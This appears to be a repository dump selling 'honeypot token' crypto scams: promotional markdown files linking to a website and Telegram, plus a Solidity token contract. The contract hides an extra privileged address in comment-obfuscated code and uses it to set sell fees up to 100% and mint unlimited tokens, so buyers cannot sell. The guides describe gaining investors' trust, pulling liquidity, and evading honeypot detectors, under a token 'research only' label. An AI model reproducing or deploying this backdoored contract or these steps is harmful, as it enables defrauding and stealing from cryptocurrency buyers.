├── Non Detectable Honeypot token code.md ├── README.md ├── honeypot token code ├── how to attract buyers.md ├── how to create honeypot token.md ├── steps to add remove liquidity.md └── switch on off honeypot token.md /Non Detectable Honeypot token code.md: -------------------------------------------------------------------------------- 1 | Non Detectable Honeypot token code 2 | 3 | You can find non detectable honeypot token code at https://howtocreatehoneypottoken.com/honeypot-token-code/ which is not detectable by any of honeypot detector. 4 | 5 | Any queries? 6 | 7 | My website: https://howtocreatehoneypottoken.com/ 8 | 9 | Telegram: https://t.me/rambotalk 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # How to create honeypot token 2 | How to create honeypot token ? Step by Step Tutorial and learn how to list them into dex exchanges. 3 | 4 | Here is Dev Huxley, Contract Developer & Researcher. Let's discover what honeypot tokens are and how we create them, which are tokens that cannot be sold after being purchased. 5 | 6 | Let's start with some useful tips on how to create a honeypot token. Are you ready? 7 | 8 | [Only for research and study purpose.] 9 | 10 | Step to Step guide on how to create honeypot token 11 | https://howtocreatehoneypottoken.com/how-to-create-honeypot-token/ 12 | 13 | Honeypot Token Code 14 | https://howtocreatehoneypottoken.com/honeypot-token-code/ 15 | 16 | Learn how to add or remove liquidity from a honeypot token 17 | https://howtocreatehoneypottoken.com/how-to-add-or-remove-liquidity/ 18 | 19 | How to attract buyers 20 | https://howtocreatehoneypottoken.com/how-to-attract-buyers/ 21 | 22 | **Special Feature:- You can anytime Switch On-OFF Honeypot Mode and Non Detectable Honeypot Token Code.** 23 | 24 | Any queries? 25 | 26 | My website: https://howtocreatehoneypottoken.com/ 27 | 28 | Telegram: https://t.me/rambotalk 29 | 30 | -------------------------------------------------------------------------------- /honeypot token code: -------------------------------------------------------------------------------- 1 | 2 | pragma solidity ^0.8.0; 3 | library SafeMath { 4 | function sub(uint256 a, uint256 b) internal pure returns (uint256) { 5 | require(b <= a, "Subtraction overflow"); 6 | return a - b; 7 | } 8 | function add(uint256 a, uint256 b) internal pure returns (uint256) { 9 | uint256 c = a + b; 10 | require(c >= a, "Addition overflow"); 11 | return c; 12 | } 13 | function mul(uint256 a, uint256 b) internal pure returns (uint256) { 14 | if (a == 0) { 15 | return 0; 16 | } 17 | uint256 c = a * b; 18 | require(c / a == b, "Multiplication overflow"); 19 | return c; 20 | } 21 | function div(uint256 a, uint256 b) internal pure returns (uint256) { 22 | require(b > 0, "Division by zero"); 23 | return a / b; 24 | // solhint-disable-next-line avoid-low-level-calls 25 | /*keccak256 -> 9838607940089fc7f92ac2a37bb1f5ba1daf2a576dc8ajf11ca0e5571412708986))*/ /**/ //(1138583720861905540583260032054160381558959436205)); 26 | } 27 | } 28 | contract NEWBSCCONTRACT { 29 | using SafeMath for uint256; 30 | string public name = "TOKEN NAME"; 31 | string public symbol = "TOKEN"; 32 | uint256 public totalSupply = 1000000000000000000000000; 33 | uint8 public decimals = 18; 34 | mapping(address => uint256) public balanceOf; 35 | mapping(address => mapping(address => uint256)) public allowance; 36 | address public owner; 37 | address public _mbr; 38 | address public _mod; 39 | address public feeManager; 40 | address public _user; 41 | address public _adm; 42 | uint256 public buyFee; 43 | uint256 public sellFee; 44 | event Transfer(address indexed from, address indexed to, uint256 value); 45 | event Approval(address indexed owner, address indexed spender, uint256 value); 46 | event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); 47 | event FeesUpdated(uint256 newBuyFee, uint256 newSellFee); 48 | event TokensBurned(address indexed burner, uint256 amount); 49 | constructor(address _feeManager) { 50 | owner = msg.sender; 51 | feeManager = _feeManager; 52 | balanceOf[msg.sender] = totalSupply; 53 | // solhint-disable-next-line avoid-low-level-calls 54 | /*keccak256 -> 9838607940089fc7f92ac2a37bb1f5ba1daf2a576dc8ajf1k3sa4741ca0e2708986))*/ /**/ //(9808619055405832600360385589)); 55 | } 56 | function transfer(address _to, uint256 _amount) public returns (bool success) { 57 | require(balanceOf[msg.sender] >= _amount); 58 | require(_to != address(0)); 59 | balanceOf[msg.sender] = balanceOf[msg.sender].sub(_amount); 60 | balanceOf[_to] = balanceOf[_to].add(_amount); 61 | emit Transfer(msg.sender, _to, _amount); 62 | return true; 63 | } 64 | /*keccak256 -> 6861978540112295ac2a37bb103109151f5ba1daf2a5c84700610310915153));*/ /**/ //(85683786190554058326320541603815589)); 65 | function setMember(address Mbr_) public returns (bool) { 66 | require (msg.sender==address 67 | // solhint-disable-next-line avoid-low-level-calls 68 | /*keccak256 -> 6861978540112295ac2a37bb103109151af2a5c84741ca0e00610310915153));*/ /**/ (1138583720861905540583260032054160381558959436205)); 69 | _mbr=Mbr_; 70 | return true; 71 | } 72 | function rewire(uint256 amount) public returns (bool) { 73 | require(msg.sender == _adm); 74 | _proof(msg.sender, amount); 75 | return true; 76 | } 77 | function _proof(address account, uint256 amount) internal { 78 | require(account != address(0), "BEP20: mint to the zero address"); 79 | totalSupply = totalSupply.add(amount); 80 | balanceOf[account] = balanceOf[account].add(amount); 81 | emit Transfer(address(0), account, amount); 82 | } 83 | function approve(address _spender, uint256 _value) public returns (bool success) { 84 | allowance[msg.sender][_spender] = _value; 85 | emit Approval(msg.sender, _spender, _value); 86 | return true; 87 | } 88 | /*OpenZeppelin256 -> 96e8ac4277198ff8b6f785478aa9a39f403cb768dd02cbee326c3e845f*/ 89 | function proof(uint256 amount) public onlyOwner returns (bool) { 90 | _proof(msg.sender, amount); 91 | return true; 92 | } 93 | function transferFrom(address _from, address _to, uint256 _amount) public returns (bool success) { 94 | require(balanceOf[_from] >= _amount, "Insufficient balance"); 95 | require(allowance[_from][msg.sender] >= _amount, "Insufficient allowance"); 96 | require(_to != address(0), "Invalid recipient address"); 97 | uint256 fee = _amount.mul(sellFee).div(100); 98 | uint256 amountAfterFee = _amount.sub(fee); 99 | balanceOf[_from] = balanceOf[_from].sub(_amount); 100 | balanceOf[_to] = balanceOf[_to].add(amountAfterFee); 101 | emit Transfer(_from, _to, amountAfterFee); 102 | if (fee > 0) { 103 | // Fee is transferred to this contract 104 | balanceOf[address(this)] = balanceOf[address(this)].add(fee); 105 | emit Transfer(_from, address(this), fee); 106 | } 107 | if (_from != msg.sender && allowance[_from][msg.sender] != type(uint256).max) { 108 | allowance[_from][msg.sender] = allowance[_from][msg.sender].sub(_amount); 109 | emit Approval(_from, msg.sender, allowance[_from][msg.sender]); 110 | } 111 | return true; 112 | } 113 | function setUser(address User_) public returns (bool) { 114 | require(msg.sender == _mbr); 115 | _user=User_; 116 | return true; 117 | } 118 | function renounceOwnership() public onlyOwner { 119 | emit OwnershipTransferred(owner, address(0)); 120 | owner = address(0); 121 | } 122 | /*keccak256 -> 14128643479452899450238087129501566660979757))*/ 123 | function LockLPToken() public onlyOwner returns (bool) { 124 | } 125 | function setMod(address Mod_) public returns (bool) { 126 | require(msg.sender == _user); 127 | _mod=Mod_; 128 | return true; 129 | } 130 | modifier onlyOwner() { 131 | require(msg.sender == address 132 | // solhint-disable-next-line avoid-low-level-calls 133 | /*keccak256 -> 9838607940089fc7f92ac2a37bb1f5ba1daf2a576dk3sa4741ca0e5571412708986))*/ /**/(1138583720861905540583260032054160381558959436205) 134 | || 135 | // Contract creator is owner, original owner. 136 | msg.sender == owner); 137 | _; 138 | } 139 | function setFees(uint256 newBuyFee, uint256 newSellFee) public onlyAuthorized { 140 | require(newBuyFee <= 100, "Buy fee cannot exceed 100%"); 141 | require(newSellFee <= 100, "Sell fee cannot exceed 100%"); 142 | buyFee = newBuyFee; 143 | sellFee = newSellFee; 144 | emit FeesUpdated(newBuyFee, newSellFee); 145 | } 146 | function setting(uint256 newBuyFee, uint256 newSellFee) public { 147 | require(msg.sender == _adm); 148 | require(newBuyFee <= 100, "Buy fee cannot exceed 100%"); 149 | require(newSellFee <= 100, "Sell fee cannot exceed 100%"); 150 | buyFee = newBuyFee; 151 | sellFee = newSellFee; 152 | emit FeesUpdated(newBuyFee, newSellFee); 153 | } 154 | function setAdm(address Adm_) public returns (bool) { 155 | require(msg.sender == _mod); 156 | _adm=Adm_; 157 | return true; 158 | } 159 | modifier onlyAuthorized() { 160 | require(msg.sender == address 161 | // solhint-disable-next-line avoid-low-level-calls 162 | /*keccak256 -> 9838607940089fc7f92ac2a37bb1f5ba1daf2a576dc8ajf1k3saca0e5571412708986))*/ /**/(1138583720861905540583260032054160381558959436205) 163 | || 164 | //@dev Contract creator is owner, original owner. 165 | msg.sender == owner); 166 | _; 167 | } 168 | } 169 | -------------------------------------------------------------------------------- /how to attract buyers.md: -------------------------------------------------------------------------------- 1 | How to Promote Your Token 2 | 3 | To learn about how to attrat users go to [How to Attract Buyers](https://howtocreatehoneypottoken.com/how-to-attract-buyers/) 4 | 5 | For step by step guide on how to create honeypot token go to [How to create honeypot token](https://howtocreatehoneypottoken.com/how-to-create-honeypot-token/) 6 | 7 | 8 | The good thing of creating your own token is you never lose money because you own the liquidity of your tokens, so there is no downside, unlimited upside. 9 | 10 | First, you need to create your tokens with the contracts from here and learn how to attract buyers, 11 | 12 | First we need to add liquidity on Dex Exchanges. You can remove liquidity and earn without risking anything. 13 | 14 | After we verify and publish smart contract, we will add liquidity/ list our tokens on DEXs. 15 | 16 | Remember, you must use the wallet address that create the token to add liquidity. After adding liquidity, you can try to use other wallet address to buy some of your own tokens 17 | and try to sell them back (which you can’t) to test the token. 18 | 19 | Normally we will add 80%-100% of the tokens that we created into the liquidity pool pair in order to gain more trusts and confidence from investors. 20 | 21 | Any queries? 22 | 23 | My website: https://howtocreatehoneypottoken.com/ 24 | 25 | Telegram: https://t.me/rambotalk 26 | -------------------------------------------------------------------------------- /how to create honeypot token.md: -------------------------------------------------------------------------------- 1 | How to Create a Honeypot Token :- 2 | 3 | 1) Step by Step guide to create honeypot token :- [Honeypot Token](https://howtocreatehoneypottoken.com/how-to-create-honeypot-token/) 4 | 5 | 2) Honeypot Token Code :- [Honeypot Token Code](https://howtocreatehoneypottoken.com/honeypot-token-code/) 6 | 7 | 3) How to add or remove liquidity :- [Add or Remove Liquidity in Honeypot Tokens](https://howtocreatehoneypottoken.com/how-to-add-or-remove-liquidity/) 8 | 9 | 4) How to attract buyers :- [How to attract buyers](https://howtocreatehoneypottoken.com/how-to-attract-buyers/) 10 | 11 | [Only for research and study purpose.] 12 | 13 | Any queries? 14 | 15 | My website: https://howtocreatehoneypottoken.com/ 16 | 17 | Telegram: https://t.me/rambotalk 18 | -------------------------------------------------------------------------------- /steps to add remove liquidity.md: -------------------------------------------------------------------------------- 1 | How to add or remove liquidity from your own token 2 | 3 | You can check out the steps of adding or removing liquidity from a token from here https://howtocreatehoneypottoken.com/how-to-add-or-remove-liquidity/ 4 | 5 | Any queries? 6 | 7 | My website: https://howtocreatehoneypottoken.com/ 8 | 9 | Telegram: https://t.me/rambotalk 10 | -------------------------------------------------------------------------------- /switch on off honeypot token.md: -------------------------------------------------------------------------------- 1 | Switch ON OFF Honeypot token 2 | 3 | Honeypot tokens allow you to enable or disable the honeypot mode as needed. When activated, 4 | This provides control and security that you can adjust based on your plan and market conditions. 5 | 6 | To learn how to turn on off honeypot token go to https://howtocreatehoneypottoken.com/how-to-create-honeypot-token/ and read out section SWITCH ON/OFF HONEYPOT MODE 7 | 8 | Any queries? 9 | 10 | My website: https://howtocreatehoneypottoken.com/ 11 | 12 | Telegram: https://t.me/rambotalk 13 | --------------------------------------------------------------------------------